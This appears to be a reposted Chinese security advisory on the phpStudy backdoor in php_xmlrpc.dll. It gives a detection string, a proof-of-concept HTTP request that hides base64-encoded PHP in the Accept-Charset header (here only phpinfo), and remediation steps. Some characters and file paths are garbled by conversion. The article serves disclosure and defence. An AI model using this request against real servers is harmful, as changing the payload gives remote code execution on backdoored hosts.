phpStudypoc漏洞復現(xiàn)以及漏洞修復辦法

phpStudy于近日被暴露出有后門漏洞,之前的phpStudy2016,phpStudy2018部分版本,EXE程序包疑似被入侵者植入木馬后門,導致許多網(wǎng)站及服務(wù)器被攻擊,被篡改,目前我們SINE安全公司立即成立phpStudy安全應(yīng)急響應(yīng)小組,針對部分客戶服務(wù)器上安裝該PHP一鍵環(huán)境搭建的情況,進行了全面的漏洞修復與安全防護。第一時間保障客戶的網(wǎng)站安全,以及服務(wù)器的安全穩(wěn)定運行。關(guān)于該漏洞的詳情,我們來安全分析一下,以及復現(xiàn),漏洞修復,三個方面來入手。

創(chuàng)新互聯(lián)-專業(yè)網(wǎng)站定制、快速模板網(wǎng)站建設(shè)、高性價比華安網(wǎng)站開發(fā)、企業(yè)建站全套包干低至880元,成熟完善的模板庫,直接使用。一站式華安網(wǎng)站制作公司更省心,省錢,快速模板網(wǎng)站建設(shè)找我們,業(yè)務(wù)覆蓋華安地區(qū)。費用合理售后完善,十余年實體公司更值得信賴。

phpStudy poc漏洞復現(xiàn)以及漏洞修復辦法

國內(nèi)大部分的服務(wù)器尤其windows系統(tǒng),都有安裝phpstudy一鍵環(huán)境搭建軟件,該軟件可以自動設(shè)置安裝apache,php,MySQL數(shù)據(jù)庫,以及zend安裝,并自動設(shè)置root賬號密碼,一鍵化操作,深受廣大網(wǎng)站運營以及服務(wù)器維護者的喜歡,正因為使用的人較多,導致被攻擊者盯上并植入木馬后門到exe程序包中。

該后門文件是PHP環(huán)境當中的php_xmlrpc.dll模塊被植入木馬后門,具體的名稱,經(jīng)過我們SINE安全技術(shù)的安全檢測,可以確定是phpstudy2016.11.03版本,以及phpstudy2018.02.11版本,后門文件如下:

phpStudy poc漏洞復現(xiàn)以及漏洞修復辦法

phpphp-5.2.17extphp_xmlrpc.dll

phpphp-5.4.45extphp_xmlrpc.dll

PHPTutorialphpphp-5.2.17extphp_xmlrpc.dll

PHPTutorialphpphp-5.4.45extphp_xmlrpc.dll

在phpstudy文件夾下面搜索php_xmlrpc.dll文件,看下這個dll文件里是否包含@eval(%s('%s'))內(nèi)容的字符,如果有的話,基本上就是有木馬后門了。截圖如下:

phpStudy poc漏洞復現(xiàn)以及漏洞修復辦法

我們來分析復現(xiàn)漏洞看下,是否可以成功的利用,首先本地安裝phpstudy2016.11.03版本的安裝壓縮包,解壓到當前目錄直接點擊EXE運行即可,默認安裝的PHP版本就是php5.4.45版本,然后本地打開看下,用抓包工具檢測當前的數(shù)據(jù)包。

phpStudy poc漏洞復現(xiàn)以及漏洞修復辦法

GET /safe.php HTTP/1.1

Host:

Cache-Control: max-age=1

Upgrade-Insecure-Requests: 2

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36

(KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36

Accept:

Accept-Language: zh-CN,zh;q=0.6

Accept-Encoding:gzip

Accept-Charset:=cGhwaW5mbyUyOCUyOSUzQg==(這個是POC代碼加密的)

Cookie: Hm_lpvt_49143271fe785debb3b77f77f7c71752=1569485559;

Connection: close

漏洞的執(zhí)行位置是在數(shù)據(jù)包的Accept-Charset里,這里寫入惡意代碼加密的phpinfo,然后提交過去,就會執(zhí)行phpinfo語句。

phpStudy poc漏洞復現(xiàn)以及漏洞修復辦法

關(guān)于phpstudy漏洞的修復辦法,從phpstudy官方網(wǎng)站下載最新的版本,將php_xmlrpc.dll進行替換到舊版本里即可,對PHP的Accept-Charset的參數(shù)傳輸做安全過濾與效驗防止提交惡意參數(shù),禁止代碼的傳輸,即可修復此漏洞, (經(jīng)證實對此phpstudy官方公告此后門是黑客之前入侵了官網(wǎng)篡改了程序包導致的安全問題,強烈鄙視黑客的行為?。┤绻鷮Υa不是太了解的話,也可以找專業(yè)的網(wǎng)站安全公司來處理解決,國內(nèi)SINESAFE,啟明星辰,綠盟都是比較不錯的,目前該漏洞影響范圍較廣,請各位網(wǎng)站運營者盡快修復漏洞,打好補丁,防止網(wǎng)站被攻擊,被篡改。

網(wǎng)頁名稱:phpStudypoc漏洞復現(xiàn)以及漏洞修復辦法
標題網(wǎng)址:http://muchs.cn/article14/gedcge.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供App設(shè)計、網(wǎng)頁設(shè)計公司、服務(wù)器托管網(wǎng)站建設(shè)、靜態(tài)網(wǎng)站品牌網(wǎng)站制作

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)

成都app開發(fā)公司